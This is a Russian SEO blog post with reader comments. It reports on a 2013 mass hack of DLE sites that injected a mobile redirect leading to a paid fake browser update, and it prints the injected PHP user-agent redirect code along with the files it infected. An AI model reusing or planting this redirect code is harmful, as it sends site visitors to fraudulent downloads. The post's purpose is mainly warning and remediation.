Двери белоруссии входные двери цены.
SEO блог
Facebook SEO блог о поисковой оптимизации и продвижении сайтов Twitter SEO блог о поисковой оптимизации и продвижении сайтов RSS
SEO блог о поисковой оптимизации и продвижении сайтов
SEO блог о поисковой оптимизации и продвижении сайтов
SEO блог о поисковой оптимизации и продвижении сайтов
Массовый взлом DLE сайтов или сколько можно заработать на мобильном редиректе

Массовый взлом DLE сайтов или сколько можно заработать на мобильном редиректе

Всем привет!  В предыдущей статье было рассказано, что такое мобильный редирект и как он организовывается. Вам скорее всего интересно узнать, сколько может принести подобный взлом. Тут все индивидуально и зависит от масштабов, скажем человек скупающий шеллы на античате может вполне получать 10-15 к/дейли, что касается ситуации с массовым взломом, то тут речь идет уже о других цифрах.

В начале января огромное количество DLE пользователей забило тревогу. На их сайтах появился хитрый мобильный редирект, организованный через домен statuses.ws. ИМХО целсофту вместо того, чтобы рассылать претензии следует хорошо поработать над защитой движка, так как в данном случае взлом имел массовый характер и ломали с большой долей вероятности автоматизированным скриптом.

Основные симптомы заражения – при попытке зайти с мобильного устройства на сайт качался файл, предлагающий обновить браузер, то, что обновление НЕ БЕСПЛАТНОЕ, думаю, вы догадались и сами.

Сам редирект содержал следующий код –
$iphone = strpos($_SERVER['HTTP_USER_AGENT'],”iPhone”);
$android = strpos($_SERVER['HTTP_USER_AGENT'],”Android”);
$palmpre = strpos($_SERVER['HTTP_USER_AGENT'],”webOS”);
$berry = strpos($_SERVER['HTTP_USER_AGENT'],”BlackBerry”);
$ipod = strpos($_SERVER['HTTP_USER_AGENT'],”iPod”);

if ($iphone || $android || $palmpre || $ipod || $berry === true) {
header(‘Location: http://statuses.ws/’);
}

Причем на многих сайтах он был вставлен до 10 раз, что явно свидетельствует об автоматизации процесса. Как видно для конкретной OC были приготовлены “свои ништяки”. Данный код был замечен чаще всего в файлах:
/engine/data/config.php
/engine/data/dbconfig.php
/engine/init.php

Также замечено появление новых пользователей с правами админа. Вставки попадались и в этих файлах:
engine/init.php
index.php

Грешить на хостера, неправильные права на папки и тд. уже не приходилось, речь шла о дырке в движке. Решение проблемы – обновиться до последней на данный момент версии 9.7 и пропатчить ее с оф. сайта.

Ну а теперь вкусности. Сколько же можно заработать таким образом? В интернете валяется полно скриншотов, скажем вот этот( за его правдоподобность не отвечаю, но судя по масштабам сумма вполне реальная):

Заработок на мобильной редиректе
Заработок на мобильной редиректе

Комментарии не требуются. От себя добавлю, что взлом сайтов – уголовно наказуемое занятие и отдел “К” при желании может дотянуться и до владельца сайта statuses.ws и до хостинга, но пока это не произошло. Также всем у кого есть сайты на DLE версии ниже 9.7 настоятельно рекомендую проверить эти файлы у себя на сервере.
Всем хорошего дня!


SEO блог о поисковой оптимизации и продвижении сайтов
29th Янв 2013
SEO блог о поисковой оптимизации и продвижении сайтов
Комментарии:

Есть 24 коммент. к “Массовый взлом DLE сайтов или сколько можно заработать на мобильном редиректе”

  1. Анатолий пишет:

    Отличная статья.

  2. Зоофилия пишет:

    Да все они ломаются, будь то дле или еще что, че тут раздувать всякую пустоту не вижу смысла

  3. Гена пишет:

    Благо мой сайт остался целым и невредимым

  4. felix пишет:

    Сайты ломают не только на DLE, меня эта зараза неделю мучала на WordPress и Joomla. Знакомые также жаловались. Сволочи они, что сказать! Такие деньги ни к чему хорошему не приведут.

  5. Diman пишет:

    Было дело.После взлома моего сайта,перешел на Вордпресс. Дле неповоротливый и дырявый!!!

  6. Ильмир пишет:

    Плохо, меня тоже взломали но уже устранил проблему

  7. WCA пишет:

    А я только увидел у себя такую бяку… Спасибо… Ушел проверять остальные проекты!

  8. andrey пишет:

    Мой сайт сломали еще 30 декабря, такой себе подарочек перед НГ

    Еще хотел добавить вирус прячут еще в скриптах сжатия Gzip, если он у вас включен. То-есть не в самых скриптах, а в тех которые сжимают min

  9. Роман пишет:

    У меня так беда тоже была, на одном из моих киносайтов, там нечего сложного покопаться в коде и все, а вообще толковую версию dle нужно ставить (а при скачке зануленых версий она идет сразу же с вирусами)

  10. X-maks пишет:

    зашибись, только купил уже ломают…

  11. Михаил пишет:

    Снять деньги не составляет большого труда.

    P. S. Я так думаю

  12. Lisa пишет:

    Интересная задумка со взломом не читала в инете чего то подобного
    Интересно как потом снимают награбленные деньги

  13. Рыбак со стажем пишет:

    Я сам потерпел взлом. Один мой сайт заразили вирусом. Ваш сайт промовебер.ру тоже взломали?

  14. SEO солдат пишет:

    Я тоже пострадал, на моем сайте с суточным трафом в 8 кило яша обнаружил редирект мобильного трафика и занес сайт в свой вирусный список, сейчас расхлебываю…

  15. Альберт пишет:

    Как же умно всё продумано :). Я раньше тоже пользовался DLE, только потом окончательно перешел на Joomla. Она мне как то ближе

  16. Ника пишет:

    у меня у знакомого сайт написан на DLE, нужно ему дать почитать этот пост, пусть проверяет

  17. red-nail пишет:

    с утра седня чистил сервер. сдуру поставил на тест скрипт каталога статей. а в нем бэкдор был. засрал мне все сайты.

  18. Весельчак пишет:

    Есть обратная сторона. как можно на излечении таких сайтов поднять тИЦ)

  19. jkeks пишет:

    В Wp нет ? Вы заходили в Античаты ?
    сколько угодно на ВП.. особенно если не следишь..
    Я вот не следил, и меня выломали один раз, дак я после этого свой антивзломщик написал.. jAntivirus

  20. Landorn пишет:

    Обалдеть, хорошо что в WP такого нет (тьфу, тьфу, тьфу). Прибыльная тема была, у хацкеров затраты были только на шеллы.

    • Guns Air пишет:

      поддерживаю, хорошо что перешел с нуленного DLE на WordPress. Кстати на одном из старых сайтов на DLE помню была такая гадость, и ведь чисто случайно заметил, когда с телефона зашел.

      • red-nail пишет:

        вордпресс тоже ломают. вчера нашел на одном своем блоге траянов, пока копался, каспер сработал несколько раз и внес в черный список, сегодня с утра отправил им письмо, а то ведь даже восстановить сайт не могу, все блокируется.

    • Ильмир пишет:

      На WordPress есть такое

Написать ответ

Анти-спам: выполните задание


SEO блог о поисковой оптимизации и продвижении сайтов
 

SEO блог о поисковой оптимизации и продвижении сайтов
Все права защищены © 2013 SEO блог
SEO блог о поисковой оптимизации и продвижении сайтов